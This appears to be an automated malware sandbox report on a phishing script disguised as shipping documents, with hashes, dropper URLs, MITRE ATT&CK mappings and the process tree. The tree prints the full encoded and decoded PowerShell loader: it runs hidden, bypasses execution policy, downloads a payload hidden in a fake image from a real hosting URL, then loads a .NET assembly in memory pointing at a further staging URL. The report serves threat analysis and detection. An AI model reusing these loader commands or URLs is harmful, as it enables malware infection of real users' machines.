5dfa193d083fcbe25cc3f69f6f5f961a0cefb60f9fcac2a79b27b7c04b2ab5fd

General

Target

Shipping Docs_waybill NO 2005xxx351.wsf
Size

189KB
MD5

3b970c76dbc74cd9b119f487a22c1683
SHA1

4ebb9876723c2fc5fda46b098094cf0104efac55
SHA256

73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812
SHA512

74f4bbe6c8ff3769e4a70189bf28aba7ac0bf8c6a4440c88b24fa6d2207ea4169f032b37d465ca981f2bc4f69f25fd089256bde24d88f7a4e003f6d80beef821
SSDEEP

3072:z/zQ6Vv//riU/tEqZjCwNZiU/tEyWiU/tEqZjCwNZiU/tEAI6:0U/tESLNQU/tEylU/tESLNQU/tEa

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://res.cloudinary.com/daxwua63y/image/upload/v1737543662/new_image_h8btwc.jpg%20

exe.dropper

https://res.cloudinary.com/daxwua63y/image/upload/v1737543662/new_image_h8btwc.jpg%20

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2708	powershell.exe
7	2708	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3040	powershell.exe
2708	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1288	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3040	powershell.exe
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1288 wrote to memory of 3040	1288	WScript.exe	30
PID 1288 wrote to memory of 3040	1288	WScript.exe	30
PID 1288 wrote to memory of 3040	1288	WScript.exe	30
PID 3040 wrote to memory of 2708	3040	powershell.exe	32
PID 3040 wrote to memory of 2708	3040	powershell.exe	32
PID 3040 wrote to memory of 2708	3040	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping Docs_waybill NO 2005xxx351.wsf"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $exactitude = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABiAGEAZgB0AGEAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAAzADYANgAyAC8AbgBlAHcAXwBpAG0AYQBnAGUAXwBoADgAYgB0AHcAYwAuAGoAcABnACAAJwA7ACQAcwB0AGEAcgBjAGgAaQBlAHMAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABwAGEAcgBhAGcAYQBsAGEAYwB0AGkAbgAgAD0AIAAkAHMAdABhAHIAYwBoAGkAZQBzAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYgBhAGYAdABhACkAOwAkAGQAYQByAHIAYQBpAGcAbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABwAGEAcgBhAGcAYQBsAGEAYwB0AGkAbgApADsAJAB1AG4AcwBvAHUAbgBkAGwAeQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAVABhAGwAZQBzAGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAZQBsAG8AYwB1AHQAZQAgAD0AIAAkAGQAYQByAHIAYQBpAGcAbgBlAGQALgBJAG4AZABlAHgATwBmACgAJAB1AG4AcwBvAHUAbgBkAGwAeQApADsAJABjAGgAcgBpAHMAdABvAHAAaABhAG4AeQAgAD0AIAAkAGQAYQByAHIAYQBpAGcAbgBlAGQALgBJAG4AZABlAHgATwBmACgAJABUAGEAbABlAHMAZQApADsAJABlAGwAbwBjAHUAdABlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYwBoAHIAaQBzAHQAbwBwAGgAYQBuAHkAIAAtAGcAdAAgACQAZQBsAG8AYwB1AHQAZQA7ACQAZQBsAG8AYwB1AHQAZQAgACsAPQAgACQAdQBuAHMAbwB1AG4AZABsAHkALgBMAGUAbgBnAHQAaAA7ACQAdQB0AGwAYQByAHkAIAA9ACAAJABjAGgAcgBpAHMAdABvAHAAaABhAG4AeQAgAC0AIAAkAGUAbABvAGMAdQB0AGUAOwAkAGgAZQBtAG8AbAB5AHQAaQBjAGEAbABsAHkAIAA9ACAAJABkAGEAcgByAGEAaQBnAG4AZQBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGUAbABvAGMAdQB0AGUALAAgACQAdQB0AGwAYQByAHkAKQA7ACQAYQBuAGMAaQBsAGwAYQAgAD0AIAAtAGoAbwBpAG4AIAAoACQAaABlAG0AbwBsAHkAdABpAGMAYQBsAGwAeQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAaABlAG0AbwBsAHkAdABpAGMAYQBsAGwAeQAuAEwAZQBuAGcAdABoACkAXQA7ACQATABhAFQAbwBuAHkAYQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhAG4AYwBpAGwAbABhACkAOwAkAHAAcgBvAGYAZQBjAHQAaQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQATABhAFQAbwBuAHkAYQApADsAJABjAG8AbABkAGMAbwBjAGsAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJABjAG8AbABkAGMAbwBjAGsALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACcAOAA2AGYAZAAyAGEAMQAzADkAYgA5ADEALQA3AGUAYgBhAC0ANwAxADkANAAtAGMAMwBlAGEALQBhADkAYgBiADgAZgBhAGYAPQBuAGUAawBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAB0AC4AYQB6AGEARwAvAG8ALwBtAG8AYwAuAHQAbwBwAHMAcABwAGEALgA2ADcANwBkADIALQBvAGwAbwBwAGgAdABhAGsALwBiAC8AMAB2AC8AbQBvAGMALgBzAGkAcABhAGUAbABnAG8AbwBnAC4AZQBnAGEAcgBvAHQAcwBlAHMAYQBiAGUAcgBpAGYALwAvADoAcwBwAHQAdABoACcALAAgACcAaQBuAGMAbwBuAGcAcgB1AG8AdQBzAGwAeQAnACwAIAAnAGkAbgBjAG8AbgBnAHIAdQBvAHUAcwBsAHkAJwAsACAAJwBpAG4AYwBvAG4AZwByAHUAbwB1AHMAbAB5ACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnAGkAbgBjAG8AbgBnAHIAdQBvAHUAcwBsAHkAJwAsACAAJwBpAG4AYwBvAG4AZwByAHUAbwB1AHMAbAB5ACcALAAnAGkAbgBjAG8AbgBnAHIAdQBvAHUAcwBsAHkAJwAsACcAaQBuAGMAbwBuAGcAcgB1AG8AdQBzAGwAeQAnACwAJwBpAG4AYwBvAG4AZwByAHUAbwB1AHMAbAB5ACcALAAnAGkAbgBjAG8AbgBnAHIAdQBvAHUAcwBsAHkAJwAsACcAaQBuAGMAbwBuAGcAcgB1AG8AdQBzAGwAeQAnACwAJwAxACcALAAnAGkAbgBjAG8AbgBnAHIAdQBvAHUAcwBsAHkAJwAsACcAYQByAHQAaAByAG8AcwBjAG8AcAB5ACcAKQApADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsA';$Ashkenazy = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($exactitude));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $Ashkenazy
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$bafta = 'https://res.cloudinary.com/daxwua63y/image/upload/v1737543662/new_image_h8btwc.jpg ';$starchiest = New-Object System.Net.WebClient;$paragalactin = $starchiest.DownloadData($bafta);$darraigned = [System.Text.Encoding]::UTF8.GetString($paragalactin);$unsoundly = '<<BASE64_START>>';$Talese = '<<BASE64_END>>';$elocute = $darraigned.IndexOf($unsoundly);$christophany = $darraigned.IndexOf($Talese);$elocute -ge 0 -and $christophany -gt $elocute;$elocute += $unsoundly.Length;$utlary = $christophany - $elocute;$hemolytically = $darraigned.Substring($elocute, $utlary);$ancilla = -join ($hemolytically.ToCharArray() | ForEach-Object { $_ })[-1..-($hemolytically.Length)];$LaTonya = [System.Convert]::FromBase64String($ancilla);$profection = [System.Reflection.Assembly]::Load($LaTonya);$coldcock = [dnlib.IO.Home].GetMethod('VAI');$coldcock.Invoke($null, @('86fd2a139b91-7eba-7194-c3ea-a9bb8faf=nekot&aidem=tla?txt.azaG/o/moc.topsppa.677d2-olophtak/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth', 'incongruously', 'incongruously', 'incongruously', 'MSBuild', 'incongruously', 'incongruously','incongruously','incongruously','incongruously','incongruously','incongruously','1','incongruously','arthroscopy'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabB157.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB16A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
54968436115fcac8b3f6e5204884b4e8

SHA1
45c19db15fd971d61641218b008dfd032d1410b1

SHA256
2567f11f0c01433162118a54b3a8ea0007c874dac6bc902a85974d410cc2d5dc

SHA512
22564de0f1d3a2a963b1497269772b72fe0c517c3a6e127f49c30d1a0909501d30897e4e1a52709dc5173d67a90178efc8ad67fecfd1fefcd58f0e5b839cf7da

Download Submit
memory/2708-49-0x000000001AED0000-0x000000001B08A000-memory.dmp

Filesize
1.7MB

Download
memory/3040-4-0x0000000002C10000-0x0000000002C90000-memory.dmp

Filesize
512KB

Download
memory/3040-5-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/3040-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/3040-46-0x0000000002C10000-0x0000000002C90000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing